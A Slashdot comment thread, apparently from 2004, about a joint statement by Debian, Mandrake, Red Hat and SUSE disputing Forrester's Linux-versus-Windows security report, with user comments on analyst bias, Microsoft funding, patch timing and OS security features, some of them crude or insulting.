Linux Distributions Respond to Forrester

dave writes "GNU/Linux vendors Debian, Mandrake, Red Hat, and SUSE have joined together to give a common statement about the Forrester report entitled "Is Linux more Secure than Windows?". Despite the report's claim to incorporate a qualitative assessment of vendor reactions to serious vulnerabilities, it treats all vulnerabilities are equal, regardless of their risk to users. As a result, the conclusions drawn by Forrester have extremely limited real-world value for customers assessing the practical issue of how quickly serious vulnerabilities get fixed."

IT Research shops

WTF? Why does anyone buy shit from these people.

The executive management of the agency that I work for pays Meta $500/hr to evaluate project plans... they always rubber stamp whatever answer the execs want.

Re:IT Research shops

The executive management of the agency that I work for pays Meta $500/hr to evaluate project plans... they always rubber stamp whatever answer the execs want.

And then when the project fails, they can go the higher-ups or shareholders and say "See, the plan was sound, it was that Anonymous little shit down in IT that screwed it up. Lay him/her off and ship the job to India!"

Then they all go celebrate their cost-cutting with booze and hookers, whilst lighting their cigars with $100 bills.

Re:IT Research shops

How did this get modded 'interesting?'

It is just mindless anti-management, anti-outsourcing, "I hate the bastards above the rules" bullshit. It is probably true, but Interesting, it is not.

I should know, I wrote it.

Re:IT Research shops

I should know, I wrote it.

Bull shit you stupit twerp, I *FUCKING* wrote it. No push the fuck off and write your own trolls.

Re:IT Research shops

[ron_ivi]

Forrester are the same goofbals that claim Sun Erases Doubts About Its Viability by becoming another SCO-like pawn in Microsoft's linux war. It's an expensive subscription so it's easier&cheaper to read Cnet's spin on the forrester report instead, which claims "These moves remove doubts about Sun's viability by bolstering Solaris".

Their logic seems to be windows IP will bolster Solaris!?! Wow.

Betcha microsoft or some exec who gets a bonus paid for that report.

no way!

I'm sorry, but I simply can't believe that a research company, a company DEVOTED TO RESEARCH, would come out with biased opinions influenced by money.

Re:no way!

[Frizzle+Fry]

I'm sorry, but I simply can't believe that a research company, a company DEVOTED TO RESEARCH, would come out with biased opinions influenced by money.

Yes, let's instead listen to the unbiased people at Debian, Mandrake, Red Hat, and SUSE. Surely their opinions on this issue are less biased than those of the research company.

Re:no way!

[TempusMagus]

Uh, Troll-boy. These companies are DEVOTED TO MAKING MONEY not research. RESEARCH just happens to be the product they are selling.

Re:no way!

[AsimovBesterClarke]

> Yes, let's instead listen to the unbiased people at Debian, Mandrake, Red Hat, and SUSE. Surely their opinions on this issue are less biased than those of the research company.

And are these companies hiding this bias? The is no question what their agenda is (well, I suppose if one was an utter moron and didn't realize what each of these have in common). And, is the research ([sic]) company claiming to be unbiased? If I'm not mistaken, they claim to have done an independent investigation. Yet, I'm sure there is a few posts above here pointing out they are ready, willing and quite capable of producing exactly the results you pay for (and a post or two about who actually paid for these particular results).

Re:no way!

[agent+dero]

Was sarcasm I believe, don't drink so much coffee man

We can respond...

[James+A.+M.+Joyce]

...but will they listen?

Re:We can respond...

[name773]

do we listen?

Re:We can respond...

What was that?

Re:We can respond...

[Jonny+Royale]

Depends if you can pay an "IT reasearch firm" to put their name on your marketing material or not.

BTW, here's the report....if you have 900 USD to get it:

The Forrester Report

Re:We can respond...

The fact that they someone will pay $899 to buy it implies they are looking at alternatives to Microsoft anyways ... or they'd rather go and buy another subscription for Windows or something :-)
And well, isn't it great for a "free" product's evaluation report to get a price tag of $899!!

Analyst hacks will never bit the hand that feeds

[darthcamaro]

And who paid for the Forrestor study?? Not Red Hat they haven't got the cash. Probably another Microsoft funded event.
The most dramatic thing from my point of view is that SuSe, Red Hat, Mandrake and community based Debian all got together to formulate a common reply. This is the BEST news we could ever hope for - a common on unified front - no forking when it comes to security.

Slant

[The_Mystic_For_Real]

The story posted here is a direct quote from the response made by the Linux representatives to the report. I think that a greater effort should be made to get news from more impartial sources or to at least warn the reader that what he is reading is from an obviously biased source regardless of whether or not it is true.

Re:Slant

[Spyro+VII]

Have you ever considered that all of the media that you read and watch is biased? And actually if you'd read the article, you'll notice that what they say is perfectly reasonable. Basically, the forrester report was much to narrow focused to have a fair assessment of the data. The simplicity of the initial report is actually laughable. MS fixing 100% of its bugs? Now, remember that Microsoft's code is *not* open source, so they can wait until some poor sap gets bit a bug before they fix it. The initial report by forrester was faulty and relied upon obscurity and simplicity to blatantly shift the report in Microsoft's favor. And before anyone says that forresster is a research company and as such is unbiased, I recommend that you look to SCO for an example of MS's cleverness.

Re:Slant

I think the title "Linux Distributions Respond to Forrester" and the text "GNU/Linux vendors Debian, Mandrake, Red Hat, and SUSE have joined together to give a common statement" do a sufficiently good job of warning the reader of possible bias. If those two chunks don't set off slant alarms in your head, I doubt you're capable of much critical thought at all.

Re:Slant

Huh? The story is that the Linux companies are responding. Of course it makes sense to include a representative quote of their actual response. Of course it doesn't need to be stated "Since these are Linux companies they will favour Linux".

Re:Slant

[blackbear]

This is Slashdot. If the news wasn't a little slanted I wouldn't read it.

Besides. It's the community take on events that I'm interested in. I can check out the wire services if I just want the news.

Re:Slant

[morelife]

It's Michael. What do you expect. Just be glad he didn't doctor it up a little on the emotional spin side. This will be marked flamebait, offtopic, troll in about two minutes.

I did notice though that that is about the first full length article LX has themselves published (instead of pointing to other Linux sites) so kudos to them:)

Re:Slant

[kfg]

. . .at least warn the reader that what he is reading is from an obviously biased source. . .

You mean like the first sentence?

KFG

Re:Slant

Well, I don't think you should add a comment to the story, and we should have to wait for a more impartial source or you should, at least, warn the reader you are expressing your opinion, whether it is true or not.

Also, please learn about things called commas. They really do help with making a point clearer.

Re:Slant

The Slashdot summary states who wrote the reply to the Forrester article - full disclosure. The reply states who wrote it - full disclosure.

The ZD article about the Forrester report does not reveal that Microsoft funded the report. No disclosure. An appearance of impartiality is conveyed while concealing a gross conflict of interest.

There are no impartial sources. There are only sources who acknowledge their interests, and those who conceal them. I'll take full disclosure.

Did you complain to ZD about their failure to disclose that the Forrester report was not impartial?

Re:Slant

[aardvarkjoe]

Well, of course the news here is slanted. Otherwise they'd have to call it "Pipedot."

Re:Slant

[Rimbo]

Ironic that you say that, considering that Microsoft sponsored the Forrester report the group is protesting against.

Besides, uh... on what planet is Slashdot impartial? Duh.

Re:Slant

[Zonnald]

Because....

They didn't actual fund this report?

Re:Slant

[speeDDemon+(nw)]

pipedot.org -> isnt that site already taken ? ooops, no it's smokedot.org now all we need is bongdot.org and were done!

Re:Slant

[houghi]

Have you ever considered that all of the media that you read and watch is biased?

Yeah. That is why there should be a media where everybody can have a say. You know, for stuff that matters. Then that media will become completely unbiased. ;-)

If you think that mass-circulated study is bad...

[Apostata]

...try this, from good o'l News.com: Moving to Linux May Not Save Money -- Yet .

just in case

(site loads slowly. here we go in case of /.'ing)

GNU/Linux vendors Debian, Mandrake, Red Hat, and SUSE have joined together to give a common statement about the Forrester report entitled "Is Linux more Secure than Windows?". Despite the report's claim to incorporate a qualitative assessment of vendor reactions to serious vulnerabilities, it treats all vulnerabilities are equal, regardless of their risk to users. As a result, the conclusions drawn by Forrester have extremely limited real-world value for customers assessing the practical issue of how quickly serious vulnerabilities get fixed.

The security response teams of GNU/Linux distributors Debian, Mandrakesoft, Red Hat and SUSE have assisted Forrester in gathering and correcting data about vulnerabilities in their products. The gathered data was used at Forrester for a report that became titled "Is Linux more secure than Windows?". While the Linux vulnerability data that is the basis for the report is considered to be sufficiently accurate and useful, Debian, Mandrakesoft, Red Hat and SUSE, from now on referred to as "We", are concerned about the correctness of the conclusions made in the report.

We believe that it is in the interest of our usership and the OpenSource community to respond to the Forrester report in the form of a common statement:

We were approached by Forrester in February 2004 to help them refine their raw data. Forrester collected data about the vulnerabilities that affected Linux during a one year period and looked at how many days it took us to provide fixes to our users. Significant efforts have been put in not only making sure that the underlying dataset for the Linux vulnerabilities was correct, but also to articulate the special technical and organisational care taken in the response processes in the professional Open Source security field. This expertise is greatly appreciated by our usership since it adds a high value to our products, but we see that most of this value has been ignored in the methods used for the analysis of the vulnerability data, leading to erroneous conclusions.

Our Security Response Teams and security specialized organisations of respectable reputation (such as the CERT/DHS, BSI, NIST, NISCC) exchange information about vulnerabilities and cooperate on the measures and procedures to react to them. Each vulnerability gets individually investigated and evaluated; the severity of the vulnerability is then determined by each of the individual teams based on the risk and impact as well as other, mostly technical, properties of the weakness and the software affected. This severity is then used to determine the priority at which a fix for a vulnerability is being worked on weighed against other vulnerabilities in our current queue. Our users will know that for critical flaws we can respond within hours. This prioritisation means that lower severity issues will often be delayed to let the more important issues get resolved first.

Even though the Forrester report claims so, it does not make that distinction when it measures the time elapsed between the public knowledge of a security flaw and the availiability of a vendor's fix. For each vendor the report gives just a simple average, the "All/Distribution days of risk", which gives an inconclusive picture of the reality that users experience. The average erroneously treats all vulnerabilities as equal, regardless of the risk. Not all vulnerabilities have an equal impact on all users. An attempt has been made to allocate a severity to vulnerabilities using data from a third party, however the classification of "high-severity" vulnerabilities is not sufficient: The mere announcement of a vulnerability by a particular security organisation does not necessarily make the vulnerability severe - similarly, the ability to exploit a weakness over the network (remote) is often irrelevant to the vulnerability's severity.

We believe the report does not treat the open source vendors and single closed source vendor in th

Re:just in case

[stephanruby]

"site loads slowly. here we go in case of /.'ing"

Too little too late, this guy is going to write a story on how his site received an unexplained but highly suspicious DOS attack on April 6th through April 15th.

The report and it's value

[jd]

Let's start by noting the existance of SARA and TARA for Unix, but not for Windows. It's hard to scan a box, locally, if you don't have the tools to do so. It's therefore correspondingly hard to fix problems under Windows.

Then, there is the relevence of bugs. SE-Linux makes many otherwise serious glitches a mere nuicense. As do other modules in the LSM.

There is no chroot() in Windows, to the best of my knowledge. This also changes the severity of a bug from catastrophic to irritant, in Unix.

Finally, Nessus and SAINT are more often used to scan Unix boxes than Windows ones.

Re:The report and it's value

[ajv]

SARA is akin to MSBA and similar tools (some free, some not).

Microsoft publishes extensive security checklists for various roles, and automates this process for the most likely deployment scenarios via the IIS Lockdown tool and local / group policy templates. You can manage a large fleet of computers using Group Policy in AD, so your lockdowns quickly apply to all computers, not just one.

Nessus scans at the network level and works acceptably to find most Windows network-based vulnerabilities. I use Nessus myself when doing vulnerability assessments as a shortcut / initial pass. Nessus is not good at finding configuration or local user weaknesses. .NET supports sandboxing similar a chroot jail if an application asks for it. Windows supports junction points, which can be used (but I've never seen used) to contain a particular application to a particular volume (which could be a virtual device, or similar).

However, in Windows, the use of ACLs, low privilege service accounts, and utilizing fine grained privileges replaces big ass isolation required by Unix-like operating systems simply because most Unix-like OSs don't have this level of security architecture or fine grained access control.

I don't use SAINT, so I have no comment on that.

Just because an OS is different or you personally don't have knowledge of lockdowns, doesn't make another OS insecure. It requires bad coding practices and poor configuration to do that. Thanks to Windows' popularity, there's more than enough of this to go around.

Andrew

Re:The report and it's value

[big+daddy+kane]

There is no chroot() in Windows, to the best of my knowledge
one can change the enviornment variables in windows, not recomended but can easily be accomplished. For windows xp, go to system properties > advanced > enviornment variables. then you can change among others, the tmp and windows directories.

Re:The report and it's value

[Lehk228]

yea except when you do this there had damned well better be a copy of windows installed into that directory

Re:The report and it's value

[BlackHawk-666]

chroot does more than just change an environment variable. It moves the root of the drive to a new location, thus preventing you from accessing *any* files in that location. Simply changing the environment variable is only going to redirect a few apps that check for this variable, you can still read/write those directories.

Re:The report and it's value

Of course linux has ACL, it's in the LSM modules, part of SE-Linux.

Well

[odano]

Well the good news is that the people that actually care about this study are the people that understand its shortcomings and inaccuracies.

In the long term, businesses still care about cutting costs, and linux is the way to do that.

On Microsoft's Side

[Henry+V+.009]

Does anybody know of a case where someone has been attacked through a Microsoft vulnerability between the time of its going public and the release of the patch? The most often encountered scenario seems to be people who never upgrade getting attacked because hackers have reverse engineered the patches.

Re:On Microsoft's Side

[pholower]

Mostly businesses have gotten attacked before the patch was released, but you don't hear about them because they don't release that information to let others know that they in fact have a security flaw.

Microsoft finds their flaws in a number of ways, businesses that report them, and white hat hackers they do this for a living.

But to answer your question a little better. If you look back at the flaws in IE, consumers, not businesses, were the ones that got attacked before the patches were out. Again, because it was a person, it is hard to track down the exact problem that occured to them. IE has the flaws that were exploited before the patches came out. Phishing scams from the address bar.

Re:On Microsoft's Side

There was that MS SQL worm a while back. The fix was unfixed by a later patch and left you vulnerable if you were up to date.

Re:On Microsoft's Side

[awkScooby]

Does anybody know of a case where someone has been attacked through a Microsoft vulnerability between the time of its going public and the release of the patch? The most often encountered scenario seems to be people who never upgrade getting attacked because hackers have reverse engineered the patches.

I think it was Stanford University that got hit with some of the RPC DCOM vulnerabilities before a patch was released. No, it wasn't one of the worms, it was hackers backdooring systems.

Re:On Microsoft's Side

[demaria]

I guess it depends on who you ask and what you consider when you say 'businesses'. But in a poll I conducted recently, respondants cited known vulnerabilities most when asked what method of attack seccessfully breached security. Misconfigured settings was second.

Biggest problem: time and manpower to test the patches before deployment.

Debian's a vendor?

Don't vendors sell things?

Re:Debian's a vendor?

[Soko]

Sure. So is the Fedora project (though you could call them "RedHat", and not be too far off).

I rely on then for providing me a rock-stable, thoroughly tested distribution and any security upates to that distribution.

I, in turn, (since I'm not a really good coder) spread the good word that these people know what they're doing. If I find a bug or security vulnerability, I report it to them ASAP. I also test out thier new stuff, and report bugs and such for them, and suggest ways that thye might improve thier products.

They give me something, I pay them in the currency they want. They are indeed a vendor.

Soko

Re:Debian's a vendor?

not necessarily.

From reference.com:

vend v. vended, vending, vends
1. a. To sell by means of a vending machine.
b. To sell, especially by peddling.
2. To offer (an idea, for example) for public consideration.

Re:Debian's a vendor?

[rhuntley12]

Same here, all 4 people I work with are running Sarge right now. I've also bought a set of disks from them even though I don't use it, I use the testing. It's too bad that Debian is a little bit harder to install as I had to help everyone here at work install it, although it is easy after I figured everything out since we all have the same laptops.

"Secure box"

[SKPhoton]

Any box in the wrong hands can become unbelievably secure, regardless of the OS.
What would be a very interesting read would be to have sys admins lock down the box (perhaps those do consulting for corporations) and then test how well they're set up.
Granted, it's up to the admin at that point so have many admins on different boxes.

Re:"Secure box"

[BlackHawk-666]

Even a Linux box would be insecure if you installed a SQL server onto it and set the sa password to nothing - but then, who would do that...hehe.

Re:"Secure box"

[anno1a]

Uhm... "Secure this box!"

"Ok..." *unplugs ethernet cable, and as a precaution makes iptables block everything*

Forrester's right, you know

[ObviousGuy]

For the most part, Linux is used in the back rooms for such things as fileserving, printserving, and (especially critical for many companies) webserving. A failure on any one of these machines results in a significant risk of loss of data, company secrets, and company network infrastructure.

A breakin on a Windows system results in the loss of local data (whose value cannot be adequately assessed, but can be assumed to be less than the sum total of all data on the servers).

It is a little like assessing the risk of terrorism in transportation. The sheer number of automobile accidents far outweighs any risk of death due to terror attack on the highways. So too is the unlikelihood that a major terrorist attack will occur in the US skies or US rail system. However, an attack on rail cargo would be far more devastating than a similar attack on the highway system. Rail provides a very high bandwidth for cargo delivery but is also restricted to an unroutable track, so any attack on rail would essentially wipe out a very significant method of cargo transportation. On the other hand, traffic can be rerouted around any localized road problem minimizing the impact of any highway attack.

Windows is ubiquitous on the desktop, but on these desktops are very small amounts of data compared to the large amounts located on servers. A loss due to breakin would be necessarily less significant than a similar breakin on a Linux server.

Re:Forrester's right, you know

[Spyro+VII]

Ummm.... So you're saying that Linux is less secure because more valuable data is stored on Linux than on Windows?

If anything, I'd say that validates Linux's usefullness.

Now I only wish someone could tell me what this has to do with the number of bugs...

Re:Forrester's right, you know

[blutrot]

Forrester's right, you know:
For the most part, Linux is used in the back rooms for such things as fileserving, printserving, and (especially critical for many companies) webserving. A failure on any one of these machines results in a significant risk of loss of data, company secrets, and company network infrastructure.

How is a windows machine different if windows is the server? The system goes down and you loose all data. You can run RAID in linux just like you can with a Win server. You can do tape backups as well. You can distribute servers so that each piece of information is not held exclusively on one database. These are not linux specific problems or windows specific solutions.

Re:Forrester's right, you know

[93+Escort+Wagon]

I think you're missing the point pretty much entirely. Microsoft isn't commissioning studies like this because they're worried about Linux on the desktop - they're trying to be big-time players in the server game. There are a lot of Windows servers out there, with access to information that's just as vital as what's stored on Linux servers.

Given that Windows very real security problems have gotten widespread media coverage over the past year or two, now even the corporate suits are aware of them. Windows marketing folks can no longer do an end-around the tech support staff to sell directly to the higher-ups.

With these sorts of marketing-driven studies, Microsoft is trying to convince the decision-makers that 1) Windows is more secure; and 2) Windows is cost-effective.

I'm not saying I buy it of course - I don't. But that is what I think is going on.

Re:Forrester's right, you know

[WindBourne]

Of course, that had nothing to do with the report. The report never focuses on the amount or value of the data, only on how the systems security is.

But the response is quite a bit more correct. By treating everything the same, you miss the big pix and allocate resources to minor issues.

Most admins use a triage system in deciding how to admin a set of systems. You focus on the critical ones first then move to none-critical. That is the same way that patches should be looked at. Give more weight to critical rather than none.

Re:Forrester's right, you know

[BlackHawk-666]

*Sob*, sometimes even RAID 5, a journalling filesystem and a tape backup aren't enough protection. I had RAID 5 and Ext3 setup on my home server, but not the tape drive since the SCSI cable didn't fit the new box. Three months slipped past and I finally got the cable I needed, pull all my equipment out the cupboard, hooked up the tape drive again, put it all back...and the tape drive didn't work. I figured I'd get it sorted next weekend.

By the next weekend the RAID controller lost the plot and fucked the hard drives. The journalling couldn't stop it from ruining the data since the controller is lower level. The tape backups were now three months out of date and *two* of the RAID drives were fucked. To add insult to injury the tape drive failed to start up two hours prior to me putting the case back on after installing Debian and XFS. The tape drive is now a boat anchor :-/

I did have a CD backup of the home drives so it wasn't all doom and gloom, but it did mean loss of some data. Moral of the story, you can never have too much data protection. On the upside, I am now rid of that RedHat stuff and onto Debian. Feh, what was the point of paying for a years subscription to their update service when they end of lifed my distro?

Re:Forrester's right, you know

[Fastolfe]

If anything, I'd say that validates Linux's usefullness.

No disrespect, but there's a logic error here. Just because people trust it more does not necessarily mean it's more trustworthy.

I personally agree with what you're getting at, but we shouldn't make statements like this.

Re:Forrester's right, you know

[blutrot]

The point I was trying to make is that these types of problems are not linux specific only. I've had similar things happen to me with RAID before. Had you been running windows, would the same problem of occured (considering it is at the controller level)? I agree with the fact that one can never have too much data protection, especially on mission critical devices.

Money talks

[Angelonio]

"Microsoft Corp., however, fixes security problems the quickest"
how can they claim that since Micro$oft receives bug reports that are not publicly announced???
It is easy to announce the bug along with the patch after having it hidden for 6 months...

Re:Money talks

[Snoopy77]

Others have called you an M$ basher but you are spot on. The OS community announces a bug and then knuckles down and fixes it. This is how it has to be done considering the developer community is a subset of the user community.

At Microsoft, and any other closed source company for that matter, bugs can be fixed inhouse and only then announced along with a patch. This is simply the nature of closed source software.

Interstingly, there have been occasions where people have sent bug reports to Microsoft and then months later, after seeing no action on it, have announced it publicly to force Microsoft's hand.

Re:Money talks

[awkScooby]

Microsoft has 2 critical vulnerabilities which they have known about for 209 days. Another one they've know about for 182 days. I don't know of any open source security holes which have sat for 209 days!

reference

I don't buy for a minute that 1) Microsoft releases patches faster or 2) that Microsoft even gives a damn about security, except for the black eye it gives them.

The cold-hard turth about Forrester and Gartner

[TempusMagus]

No one buys reports from these companies to actually learn anything. The primary purpose these companies serve is to give companies objective sounding quotes to pepper their marketing material with and to convince risk averse managers that they are safely following the largest herd.

Re:The cold-hard turth about Forrester and Gartner

[morelife]

You would not believe the amount of know-nothing corporate managers who not only pay attention to Gartner, but owe all their knowledge (what little it may be) about products and technologies to what they read there. IOW if it hasn't been covered by Gartner, it doesn't exist.

Re:The cold-hard turth about Forrester and Gartner

[Anarcho-Goth]

convince risk averse managers that they are safely following the largest herd.

Unfortunately, the largest herd is heading for a cliff.

Or would a better analogy be:

Unfortunately, the largest herd is surrounded by a pack of wolves.

The first is funnier, but the second is probably more accurate (IE script kiddies mostly target MS Products), and it was more along the lines of my first thought.

Re:The cold-hard turth about Forrester and Gartner

[TempusMagus]

I've seen that. Why bother with all that thinking anyway? For a small fee we can turn your prejudices into sound business reasoning and, for no extra cost, give you an expert to point at when shit turns sour. Not a bad business model.

Re:The cold-hard turth about Forrester and Gartner

[kwashiorkor]

There are not enough moderator points that can be applied to this statement. /ditto

Re:The cold-hard turth about Forrester and Gartner

[cornjones]

I only wish.

I worked for a world known brand that took these very seriously. They took a bunch of Jupiter reports (IIRC, they are basically the same thing). They based the whole IT strategy on a these things. All handed down from the global management team "The new direction". "We will use only best of breed" (MS and cisco) "no linux on the desktop" (surprised me that that was mentioned specifically) and a bunch of other things that basically came directly out of a bunch of these reports.

I think this is similar to people who watch fox news and think it is telling the whole truth. (if you have to proclaim yourself fair and balanced you probably aren't. think honest eddy at the used car dealership is honest?) These reports claim to be objective, but as other posters have pointed out, they tend to follow the money.

Re:The cold-hard turth about Forrester and Gartner

[$rtbl_this]

You're absolutely right. One of the first jobs I was given when I joined my current employer was to write a technical paper explaining why we should migrate from Lotus Notes to Exchange. My remit was not to do any analysis, but to provide justification for the decision our regional president had already made.

I made a lot of use of reports from the Giga and Meta groups, coincidentally sponsored by Microsoft. In the end I had a fairly respectable looking document with lots of plausible-looking quotes that the non-technical management could use to beat up the dissenting IT managers.

Five years on I still feel dirty. And no, before you ask, that's not because I think Notes was the better product.

I recevied it in my mail and I couldn't believe it

[Retype]

When I started reading the mail I first thought that debian, redhat, suse and mandrake had got together to make faster pacthes to their vulnerabilities :)) Well no, I was wrong, they are just writing a response letter together :(

Time to go back to sleep and dream of Distributions uniting forces.

Oh, and one more thing...

[TempusMagus]

How well do you trust a companies research when they use telemarketers to try and sell it to you? I had a Forrester woman call me well over 50 times in one year about buying their reports. And of course if you pay them for a custom report, a service they offer, I'm sure your extant point of view could certainly be objectively supported.

Re:Analyst hacks will never bit the hand that feed

Man, these guys should work together on something.

Excuse me

[JoeBaldwin]

But when you "unbiased, fair reporting, with due impartiality to both sides of an argument", why does Slashdot immediately spring to mind?!

Re:Analyst hacks will never bit the hand that feed

[SKPhoton]

Probably another Microsoft funded event.

you would be correct

From the article:
"In 2003, Microsoft Corporation commissioned Forrester Research, Inc., to conduct a study to measure the potential market of people in the United States who are most likely to benefit from the use of accessible technology for computers."

Re:Canadian involved in attemped terrorist attack?

[ObviousGuy]

My wife doesn't believe me, but I was up on Robson in Vancouver, BC and saw a dead ringer for UBL about a month before 9/11.

Not that I'd have any idea what ultra-orthodox UBL would be doing on Robson. It doesn't seem like his kind of place.

You left out a part...

[Spyro+VII]

[Update: Apr 6 at 7:58pm CDT... Martin Schulze from the Debian team added some more information.] Javier Fernandez-Sanguino Pena composed a survey in 2001[*] and discovered that it has taken the Debian security team an average of 35 days to fix vulnerbilities posted to the Bugtraq list. However, over 50% of the vulnerabilities where fixed in a 10-days time frame, and over 15% of them where fixed the same day the advisory was released! For this analysis, all vulnerabilities were treated the same, though. He has rerun the survey based on vulnerabilities discovered between June 1st 2002 and May 31st 2003 and found out that the median value of delays between the disclosure and releasing an advisory including a correction was 10 days (average is 13.5 days). Again, for this analysis advisories were not classified with different priorities.

Missing Distributions?

[binary_life]

Hey why aint gentoo on the list? I guess they're still compiling their response ,p (PS I love gentoo, so don't go flaming me!)

Re:Missing Distributions?

heh, that was quite clever, actually. :) props to you.

Re:Missing Distributions?

[DarkBlackFox]

Or they're too busy working to improve their product to enter a pissing match initiated by a leaky faucet.

Re:Missing Distributions?

Yeah but count on the Angry Modders Brigade to give even that post Overrated mod points...

Malleable Statistics

[The+Monster]

It's so easy to do, too.

Forrester collected security vulnerability data

What vulnerability data? The Linux vendors have an open process. Every one knows what the vulnerabilities are. Can the same be said for Windows bugs? Or are there issues known within MS that simply aren't put on the Bug List until a fix is in the works? Is it a bug if MS doesn't officially admit that it's a bug yet?

Re:Malleable Statistics

[pholower]

It is the same as Kevin Mitnick once said. There isn't a security hole if nobody knows about it. If you know about it, it is a security flaw, but to your friends that don't know about it, it is a secure machine.

Re:Malleable Statistics

[cshark]

I wonder how much of this is pandering to their audience. Enterprise users are slow, stupid, and don't adapt to change very well. They have this belief that open source software == unsupported software, and no matter how much evidence to the contrary, they will take this belief to their graves. Amazing how faith works. The report by forrester is going to say whatever they think their audience wants to hear. And if they get a kick back from microsoft, all the better.

Re:Malleable Statistics

[igloo-x]

The Linux vendors have an open process. Every one knows what the vulnerabilities are.

And yet, whenever a flaw is found in the latest 2.6 kernel, more often than not it can be traced all the way back to the early 2.4 kernels.

It may be open, but that doesn't mean everyone instantly knows they exist as soon as you hit 'save.'

Re:Malleable Statistics

[BlackHawk-666]

Microsoft will try to suppress a vulnerability report until they have completed a fix for it. This has been known to take several months in the past. It's no wonder they get their fixes in a timely way, since they have months of lead up time to correct it *before* it goes on Bugtraq.

Re:Malleable Statistics

[Nosf3ratu]

Huh?
You're trying to tell me that when you click on "Send" after a program crashes in Windows XP, that information DOESN'T go to a publicly-available database of bug reports?!

Is Linux less secure than michael?

answer: NO

Michael's asshole is wide open for anyone's use.

Re:Analyst hacks will never bit the hand that feed

uh, sounds like a different study to me, jackass

Re:Analyst hacks will never bit the hand that feed

[Spyro+VII]

I think that the point that he was trying to make is that Microsoft *has* given Forrester money for a report in the recent past.

Re:no way? Yes way!

>Yes, let's instead listen to the unbiased people
> at Debian, Mandrake, Red Hat, and SUSE. Surely
> their opinions on this issue are less biased
> than those of the research company.

Damn straight I will. Why? Because one group
represents the best interests of a bunch of fat
asses who got rich off the rest of us, and the
other not only represents the best interests of
my community, it IS COMPOSED OF MY COMMUNITY.

If you can't tell the difference, then you
have my pity, and I give you some free (as in
air) advice: Go to Microsoft's Channel 9 website.
You'll be much happier there. Honestly.

All you'll find here is a bunch of strange people
that have a crazy idea that a thing like
freedom is more important than quick $$, or that
believe it is in their own best interests to work
together than to try to $crew everyone else over.

BTW, next time you see Billy, be sure to tell
him to keep wasting his money propping
up the sock puppets, but be sure to send
enough lubrication to the sock puppets. It must
hurt like hell to be a sock puppet for Billy.

MS-Funded Research States Sky Is Red

[Eberlin]

From tests conducted at an observatory overlooking the skies of Los Angeles, researchers have concluded from the gathered data that the sky is indeed red.

Buried in all the hoopla, they never tell you that all the smoggy red photos were taken at around the time sunsets happen.

Statistics and numbers in general can be thrown any which way to serve the purpose of the writer. It's an unfortunate side-effect of being biased by nature. Even if someone were to WANT to be impartial, they'll often offer a slant merely by presenting data a certain way.

It's difficult to find people to trust when money is on the line somewhere. With Microsoft's track record and its acknowledged need for "Trustworthy Computing" (a marketing term), it's difficult to take their word. Unfortunately, with that money, they have enough marketing power to buy research, and flood biz execs with enough propaganda...and when they constantly hear that kind of information from what they'd consider mainstream sources, they start to believe it as fact.

Now that's dangerous.

Re:MS-Funded Research States Sky Is Red

[bruthasj]

Now that's dangerous.

So, when will we be able to see a /. funded research study?!

Re:MS-Funded Research States Sky Is Red

[acd294]

And you think that a /. funded study would be unbiased???

Hahahahahah!

Sorry but this community is extremely pro-linux anti-microsoft. (Not that I am not in that camp, I just recognize the facts)

But...Linux is a kernel

Just waiting for the slashbots to start lining up with the "But Linux is a kernel" argument, saying vulnerabilities in Apache etc do not mean Linux is vulnerable, but vulnerabilities in IIS make Win vulnerable.

These same slashbots will then talk about how "Linux is ready for the desktop". Not Gnome, not KDE but Linux.

Make up your minds. Either its an OS, or its a kernel. You cant pick and chose which one depending on the situation. If its a kernel, the Linux will NEVER be ready for the desktop. Gnome may be ready, KDE may be ready, but Linux will never be ready. If its the entire OS, then it is responsible for the vulnerabilities in Apache, sshd.

If Gnome is ready for the desktop, then Gnome on BSD is just as ready as Gnome on Linux, which is just as ready as Gnome under Cygwin.

Oh, and a terminal is NOT a usable desktop environment for your average end user. vi does not count as a word processor.

Its about time there was a mod score -1 Slashbot.

Re:But...Linux is a kernel

[sehari24jam]

Linux ready for desktop, was to emphasize preemptive/low-lat improvement on Linux kernel, that benefit desktop-user. This will provide desktop machine with high responsiveness.

Re:But...Linux is a kernel

Thanks for that, I'm pretty sure you're the first one to make that observation in the whole time this article has been running.

Mods: please mod this post up, this is a very valid and much overlooked point.

May we reprint that?

"...SuSe, Red Hat, Mandrake and community based Debian all got... no f..king... security."
-Linux supporter "darthcamaro" comments on the conclusions of the Forrester study, to general agreement on Linux advocacy enclave Slashdot

Re:Analyst hacks will never bit the hand that feed

[SKPhoton]

"Hey Microsoft, you guys have funded studies for us before. I know Linux is being a problem for you and we just so happen to be doing a study to see which OS is better, yours or theirs. Would you be interested in funding us once more? -nudge nudge, wink wink-"

The Bad News

[Anarcho-Goth]

Well the good news is that the people that actually care about this study are the people that understand its shortcomings and inaccuracies.

The bad news is the PHBs don't understand the study, but will try to make business discussions after reading it anyway. PHBs don't need to understand it, they're the boss.

With any luck, the businesses that employ PHBs will go under, but that is a long, slow, and painful process.

Proof Linux is more secure

[stox]

It is obvious the only way to truly secure a machine is to kill the users. There are more windows users than Linux users, therefore, it is easier to secure a Linux than it is to secure Windows. This also clearly explains why OpenBSD is one of the most secure OS's. Of course, the most secure system is StoxOS&TM which currently has no users and is perfectly secure.

Re:Proof Linux is more secure

So how do you plan to go about securing AOL and MSN? Where can I sign up to be a pen-tester?

You used Micro$oft...

...so of course you are Insightful. If you had thrown in some comment about Open Source being good for the environment, then you would have gotten +5.

As opposed to LinuxWorld or NewsForge Reports

[Ciderx]

Which are all completely justified and wonderfully written exposes of the brilliance of Linux!

Re:As opposed to LinuxWorld or NewsForge Reports

[Killswitch1968]

It's always great to see slashdot accusing other people of pro-MS bias.

1998 wants its Micro$oft back

You mindless sheep, think of something new? please?

some merit in the study

[coshx]

Like most linux geeks, I too believe that linux is much more secure than windows, but when asked why, I can only give some rant about how the open source methodology is superior and promotes faster response times to vulnerabilities. Either that, or I point to all the recent windows virus outbreaks.

But if linux were on every desktop, I'll bet you'd be getting a few emails every day with attachments like "your_paper.sh" that most of us would trivially delete, but many would stupidly run (and these are the same users who would login as root to check their email).

It wouldn't be fair to use instances like this (albeit they're not common yet) to show that linux is more vulnerable than windows.

Therefore, I believe that by quantifying the vulnerabilities and response time, Forrester is on the right track, they just need to take into consideration this response, and find a better method of quantifying the data.

Re:some merit in the study

[GreyWolf3000]

Can you actually write a shell script that takes control of the system?

